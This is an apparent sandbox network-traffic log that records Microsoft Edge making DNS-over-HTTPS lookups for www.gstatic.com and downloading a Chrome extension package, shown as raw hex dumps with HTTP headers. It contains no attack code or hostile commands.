                                                                                                                                                                                                                                                                              2024-12-20 06:31:43 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                              Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                              2024-12-20 06:31:43 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:31:43 GMT
                                                                                                                                                                                                                                                                              Content-Type: application/dns-message
                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                              Content-Length: 468
                                                                                                                                                                                                                                                                              CF-RAY: 8f4d975118ca439c-EWR
                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                              2024-12-20 06:31:43 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 ef 00 04 8e fa 41 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                              Data Ascii: wwwgstaticcomA)


                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              20192.168.2.749835172.64.41.34431552C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-20 06:31:43 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                              Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                              Content-Length: 128
                                                                                                                                                                                                                                                                              Accept: application/dns-message
                                                                                                                                                                                                                                                                              Accept-Language: *
                                                                                                                                                                                                                                                                              User-Agent: Chrome
                                                                                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                                                                                              Content-Type: application/dns-message
                                                                                                                                                                                                                                                                              2024-12-20 06:31:43 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                              Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                              2024-12-20 06:31:43 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:31:43 GMT
                                                                                                                                                                                                                                                                              Content-Type: application/dns-message
                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                              Content-Length: 468
                                                                                                                                                                                                                                                                              CF-RAY: 8f4d9751283743dd-EWR
                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                              2024-12-20 06:31:43 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 0e 00 04 8e fa 50 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                              Data Ascii: wwwgstaticcomPc)


                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              21192.168.2.749831162.159.61.34431552C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-20 06:31:43 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                              Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                              Content-Length: 128
                                                                                                                                                                                                                                                                              Accept: application/dns-message
                                                                                                                                                                                                                                                                              Accept-Language: *
                                                                                                                                                                                                                                                                              User-Agent: Chrome
                                                                                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                                                                                              Content-Type: application/dns-message
                                                                                                                                                                                                                                                                              2024-12-20 06:31:43 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                              Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                              2024-12-20 06:31:43 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:31:43 GMT
                                                                                                                                                                                                                                                                              Content-Type: application/dns-message
                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                              Content-Length: 468
                                                                                                                                                                                                                                                                              CF-RAY: 8f4d97512df419bb-EWR
                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                              2024-12-20 06:31:43 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 d1 00 04 8e fb 28 e3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                              Data Ascii: wwwgstaticcom()


                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              22192.168.2.749850162.159.61.34431552C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-20 06:31:43 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                              Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                              Content-Length: 128
                                                                                                                                                                                                                                                                              Accept: application/dns-message
                                                                                                                                                                                                                                                                              Accept-Language: *
                                                                                                                                                                                                                                                                              User-Agent: Chrome
                                                                                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                                                                                              Content-Type: application/dns-message
                                                                                                                                                                                                                                                                              2024-12-20 06:31:43 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                              Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              23192.168.2.749851172.64.41.34431552C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-20 06:31:43 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                              Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                              Content-Length: 128
                                                                                                                                                                                                                                                                              Accept: application/dns-message
                                                                                                                                                                                                                                                                              Accept-Language: *
                                                                                                                                                                                                                                                                              User-Agent: Chrome
                                                                                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                                                                                              Content-Type: application/dns-message
                                                                                                                                                                                                                                                                              2024-12-20 06:31:43 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                              Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              24192.168.2.749852162.159.61.34431552C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-20 06:31:43 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                              Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                              Content-Length: 128
                                                                                                                                                                                                                                                                              Accept: application/dns-message
                                                                                                                                                                                                                                                                              Accept-Language: *
                                                                                                                                                                                                                                                                              User-Agent: Chrome
                                                                                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                                                                                              Content-Type: application/dns-message
                                                                                                                                                                                                                                                                              2024-12-20 06:31:43 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                              Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              25192.168.2.749830142.250.181.654431552C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-20 06:31:43 UTC594OUTGET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
                                                                                                                                                                                                                                                                              Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                              Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                              2024-12-20 06:31:44 UTC570INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                              Content-Length: 154477
                                                                                                                                                                                                                                                                              X-GUploader-UploadID: AFiumC6ap6mNg0Hrw4MtMT8Ug49sMHZd2KZOx4D3WSOxG8DdznHqccDZ3EzB8t1i9o_OOP9MacNJios
                                                                                                                                                                                                                                                                              X-Goog-Hash: crc32c=F5qq4g==
                                                                                                                                                                                                                                                                              Server: UploadServer
                                                                                                                                                                                                                                                                              Date: Thu, 19 Dec 2024 15:58:14 GMT
                                                                                                                                                                                                                                                                              Expires: Fri, 19 Dec 2025 15:58:14 GMT
                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                              Age: 52410
                                                                                                                                                                                                                                                                              Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
                                                                                                                                                                                                                                                                              ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
                                                                                                                                                                                                                                                                              Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                              2024-12-20 06:31:44 UTC820INData Raw: 43 72 32 34 03 00 00 00 f3 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08
                                                                                                                                                                                                                                                                              Data Ascii: Cr240"0*H0^1"wgt2JG1)X4=&?[j,Lzjue[Iq*Ba/XPhL2%3_oH)'=e?j3UH|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
                                                                                                                                                                                                                                                                              2024-12-20 06:31:44 UTC1390INData Raw: d5 b5 fc 3c 0f e3 f9 d2 ff f8 fb 8f f1 b3 aa ea fc 5a ff 65 a8 3e ff f2 76 56 d5 8f bf fe b8 9e df fb 4a fe 2c 2f fd 58 f5 e3 8f bf ff eb c7 90 3f d4 25 97 fa fc ea 11 36 05 b0 0d c1 6d 23 05 75 5d 82 5a 95 8f c3 96 5b d7 73 d6 4d 5f 19 18 df 4a a0 b6 22 39 6c 91 fb 6c a3 f3 fd 2c 7c d5 8b 14 19 87 e6 72 d6 e7 d7 51 43 c1 e1 fb ef 9d ba 8a 34 3a 9f d4 f8 cb a1 77 6a e9 bf 9f 4f e7 c3 14 35 ef b7 d2 b7 fb ef 73 ca 6e f7 25 e1 ee 92 a5 e8 f2 fd 79 01 10 17 0f 63 e2 fc fd 91 b4 23 46 0c 8e b4 1b 1b e1 a3 2e ef a8 29 67 76 28 cd 10 21 53 ec 49 17 3e f2 20 dc 54 be b0 c5 23 dc 1d 83 eb b9 f4 a1 91 ef 0f db 83 da 5d 0b 80 ea c2 67 f3 11 c0 ee 08 4c 55 5a a8 16 40 1f 77 c3 5c 80 cd f9 b8 0f 1f 05 d8 fd 7b 9d df f7 16 4e b9 a7 7a 66 d5 6e 02 19 3a 72 f1 95 74 0c
                                                                                                                                                                                                                                                                              Data Ascii: <Ze>vVJ,/X?%6m#u]Z[sM_J"9ll,|rQC4:wjO5sn%yc#F.)gv(!SI> T#]gLUZ@w\{Nzfn:rt
                                                                                                                                                                                                                                                                              2024-12-20 06:31:44 UTC1390INData Raw: b0 78 c3 9a 50 64 5d fb 40 b0 b4 75 cd a2 45 ec b5 f7 5f 79 7d 9c cd 6c 12 a9 d6 7b 85 01 32 0c 8b 32 98 4b 0f f9 85 0b e3 3c 40 38 52 9e 25 bb 7a 8f 3d a8 39 20 c4 e5 c3 0c b0 21 bf 16 af df 1f d6 7a ee 0d 99 c3 31 ea 95 12 c6 e4 1c 29 ba 47 74 ec a8 92 fb c2 95 5e e2 ca b0 a4 22 c6 26 76 ca 5e 73 34 d5 7c c4 e8 14 05 cb 7b 5f fe 1f 38 b8 6c f0 90 19 b5 92 81 f8 cc 81 4a 13 2f 1a 49 e0 78 71 23 7a 01 c2 0c 77 ba 14 2c e7 2c 3c 91 d1 4e bc 96 0a 3a 18 c8 cd 72 ef c9 b5 f8 8f da e7 6e b0 2f 3c 34 d7 ad f4 42 40 4c d8 a1 40 88 dc 18 8e 64 d6 1c e0 63 1e 05 cf 20 06 f7 3b 0b 70 9c 51 ec 56 dd fb 7d 11 7f 6b 6d ef 0d 1e 52 b0 4d ad e1 45 2a 6f 3e c1 ba 25 26 a2 d8 aa 43 9d 31 12 d1 9a b3 ce 3a 54 eb 81 1f 1b e6 0b 22 ca 2f 2d 08 8a 65 ef 77 c9 57 62 8f 5b 75
                                                                                                                                                                                                                                                                              Data Ascii: xPd]@uE_y}l{22K<@8R%z=9 !z1)Gt^"&v^s4|{_8lJ/Ixq#zw,,<N:rn/<4B@L@dc ;pQV}kmRME*o>%&C1:T"/-ewWb[u
                                                                                                                                                                                                                                                                              2024-12-20 06:31:44 UTC1390INData Raw: d6 e1 6d c0 c8 18 51 ae 14 17 a9 0a ca 56 6b be f7 64 1f 49 78 97 5a b7 31 fc 9e 6d a1 03 6f d9 e7 f7 53 08 01 c3 c5 b9 7a b9 76 b6 db 53 9b 34 0a 6b 4e 57 59 c3 5e 19 bf 00 5d 8b aa e8 60 1e 51 13 25 a6 e3 15 9d 7d ca 7d 96 c5 a9 08 a9 a5 b6 19 1f 60 d5 2f 62 7f 2f 56 f2 3d 57 f8 23 62 ea 11 f9 e1 a4 f7 19 e1 40 b8 32 a8 3b d1 0e 75 e4 ef 5e a5 8b 7d 02 3c b3 b0 c2 54 f7 e1 89 cc ec 28 67 76 59 d4 5a cb 31 52 23 4c d6 ce d6 b5 6f 6c b9 2b 3b 9d 71 b7 59 27 29 f2 cd 97 cc b0 23 c2 6d 96 10 c7 cf 94 88 f2 6e 6a 64 2b 51 dc e1 73 d9 1f ee 59 f3 bf e0 1f e0 37 0a e3 95 33 5e 91 a6 46 6d ea cf 64 89 31 b8 c4 90 37 6a 0a ad fa f8 c0 5c 14 73 a2 84 ce 1a f7 08 d6 da 7b b1 29 06 b5 cf 3b d4 47 7c d1 e7 3f 8a b5 cf 36 82 c8 ca 3a 7b 7f 72 db 3b 69 f1 47 d9 87 17
                                                                                                                                                                                                                                                                              Data Ascii: mQVkdIxZ1moSzvS4kNWY^]`Q%}}`/b/V=W#b@2;u^}<T(gvYZ1R#Lol+;qY')#mnjd+QsY73^Fmd17j\s{);G|?6:{r;iG
                                                                                                                                                                                                                                                                              2024-12-20 06:31:44 UTC1390INData Raw: d9 c3 10 d6 1f b2 cd fd bb 9e 52 c0 c6 ac 63 6d 6a 7d 63 a0 ee bf 61 fe 67 d7 ed a2 91 18 ea 83 e8 bc 84 3c f6 92 99 0e 39 52 fb 50 a4 8e 8d b9 50 b4 45 0e 0e e8 5c f4 48 13 5f 36 61 f7 d9 4a 58 d8 a4 e0 0f 1c 33 8b 34 04 b9 4e a3 a9 25 bf ca 6e d4 75 b6 3b e7 dc 7e 2b 83 f0 4b fc 4f d7 6f 8d 99 43 f4 2a 3b 16 67 fd f0 c0 81 0c 22 df 3e 68 cf fc 25 d5 a0 cd 23 dc 62 3a 6c 78 5f c7 cc 17 bd ce 53 9b 88 64 9b f2 5b 5f 98 71 3d 74 42 5f cb ac e5 6f 5a 85 bf 31 ff bd 96 74 6d fd 76 0d b8 3b 7f f7 5c 6e 6a 9f 9b 0e 4a ef 8f 11 b9 2d f8 fd b3 ca 10 dc fc ce f2 bf cd d3 72 cd a9 3a 3f 7e e8 ba 50 b9 e5 8c 85 66 3c 7d 7c cb b9 ae b1 2e d4 de 6e 77 cd fd f1 92 27 87 ff fc ac be ef 47 09 d4 77 ef e8 3d f4 6e 27 97 de a2 ef ff f7 ce 43 af 53 f3 cd ee 9a 5a 42 95 3d
                                                                                                                                                                                                                                                                              Data Ascii: Rcmj}cag<9RPPE\H_6aJX34N%nu;~+KOoC*;g">h%#b:lx_Sd[_q=tB_oZ1tmv;\njJ-r:?~Pf<}|.nw'Gw=n'CSZB=
                                                                                                                                                                                                                                                                              2024-12-20 06:31:44 UTC1390INData Raw: 3b ad 00 5e b3 4e cb 73 3d 2b b0 5b de b2 1b ac ac c0 bf bd 49 06 60 0a 98 e5 c3 12 dc fa fd 5e 94 c6 93 21 f3 32 c4 3a e7 6a 98 8e e5 33 47 4c 6f 66 cf 66 8f 00 02 a7 37 5d af 9f 55 1c 7d 2f aa 0d 63 45 34 4d 9c 3f 0c 6f 34 66 3d 1f 97 c5 b3 39 14 7b e1 d5 d2 27 58 29 01 4d de d6 12 94 45 a0 b2 25 18 06 ec ff 89 3f ee 0f 01 1c 62 05 b0 8e 6f 05 55 2b 9a 4e 2b 15 bb 5a f9 59 a9 86 d5 aa 13 d9 6a a3 fa 56 e4 c4 f6 2d 76 5b 8b dd a8 15 f0 25 70 2a 41 38 f2 87 e9 80 f6 c5 43 a6 19 c3 34 71 63 28 94 f7 d5 3e a8 8d fb a7 40 9e 7a b1 db b3 2a 31 8c 90 2f 56 e5 7c e4 f7 bb 83 9f 23 9a 0d 8c ce 42 04 aa 0d 19 a0 6f d7 b2 9f 34 76 5f 6d 6e 6e d6 69 e4 4e a8 e8 02 80 b4 a5 20 5a 4b c7 e1 90 e1 cc 0d d0 9a 83 61 2e 2f 3c 5f c9 d6 50 bd 42 9b 7a 69 bf 37 7e c9 9f 3e
                                                                                                                                                                                                                                                                              Data Ascii: ;^Ns=+[I`^!2:j3GLoff7]U}/cE4M?o4f=9{'X)ME%?boU+N+ZYjV-v[%p*A8C4qc(>@z*1/V|#Bo4v_mnniN ZKa./<_PBzi7~>
                                                                                                                                                                                                                                                                              2024-12-20 06:31:44 UTC1390INData Raw: 28 a5 20 e7 31 76 b4 3d 19 8d fb dd dd 4b 60 21 0e f5 cc 1f 33 7c 0c d2 d1 00 b1 81 5e 69 42 40 e6 1a a3 91 ad d6 e5 68 63 43 03 68 03 51 81 cd 15 5b 50 25 01 0d 0a a0 cc 37 ab d0 e0 70 db 64 42 b6 9f 01 12 e5 58 36 df 46 f2 c0 36 2c 9a 5a d0 f7 89 35 0a f9 9b 66 01 58 a1 26 0c 6a 4d 5c 4b 7b e9 58 7b 57 de c3 72 c3 01 d2 14 c3 96 8f 11 ca 88 39 7c 1d 63 60 72 6c d4 ef 71 f2 9c 49 0e 9c cd 6d 82 37 6e c9 82 9c 2f 0b 6e 24 69 39 f2 e2 78 83 7f 53 04 3d b6 a3 da b9 a8 71 16 77 6c c9 a0 89 56 73 5e 14 11 7c 7c 73 cb 7f 2a d9 f2 39 07 8f 6b 7d 56 ca c0 8d 61 7f 28 ec 36 ce 58 4c 31 40 12 ec 2c 6f 2c 2b 48 03 40 f2 e5 2b 62 36 46 17 48 75 0a bd e4 dc 22 b3 6e 9c 63 a5 86 71 d4 b8 31 30 23 af 19 81 78 83 e3 e9 5a 37 f8 9c 4b 22 f0 7a 80 ff ce 66 cd 63 e2 27 5d
                                                                                                                                                                                                                                                                              Data Ascii: ( 1v=K`!3|^iB@hcChQ[P%7pdBX6F6,Z5fX&jM\K{X{Wr9|c`rlqIm7n/n$i9xS=qwlVs^||s*9k}Va(6XL1@,o,+H@+b6FHu"ncq10#xZ7K"zfc']
                                                                                                                                                                                                                                                                              2024-12-20 06:31:44 UTC1390INData Raw: 01 02 c0 b2 db c0 47 fc c2 eb d3 07 f9 cb a9 80 c2 b8 ec 66 aa f4 9a a9 4f 23 9b 16 c3 b7 0c e9 94 d8 01 42 0d 39 01 c1 0c 00 05 bb 46 fd 6c 74 68 20 1a 73 50 b5 25 bf 9b 6b a1 76 bd ec 3e 5a 2f 34 82 c8 be 2c eb 72 e9 75 b9 81 5a f1 03 58 07 57 22 05 05 6e 85 8b 28 3e ed b7 c4 45 0d bd de ae 37 13 31 f9 80 3b 68 01 71 40 1d 01 b4 9c 4e 2d fe e0 0a c4 3b eb d6 d2 a0 03 02 2f 96 20 44 6d 8b bf 7c 02 6e 06 9b 90 bf 10 fe 39 81 a6 8e a4 2a f2 45 4e 66 1c a4 2b 79 31 d8 41 b0 51 04 2d 99 39 bc 77 2e 54 8b 76 6d a7 d8 02 27 86 e2 f3 dc 57 e3 03 ad 3a ec 69 93 fb 84 77 d0 7c da 4b 0a 2e 39 2d a6 36 d1 88 83 03 6c 5b fc 2f 79 5b 7d d8 a9 35 da cd 0e 88 f8 e2 03 a7 27 d3 a9 e0 0c 12 9c 09 82 d3 79 24 9a 2b cc 48 be 25 3a ab ff d0 19 81 59 31 2f 46 8c 01 89 b0 9a
                                                                                                                                                                                                                                                                              Data Ascii: GfO#B9Flth sP%kv>Z/4,ruZXW"n(>E71;hq@N-;/ Dm|n9*ENf+y1AQ-9w.Tvm'W:iw|K.9-6l[/y[}5'y$+H%:Y1/F
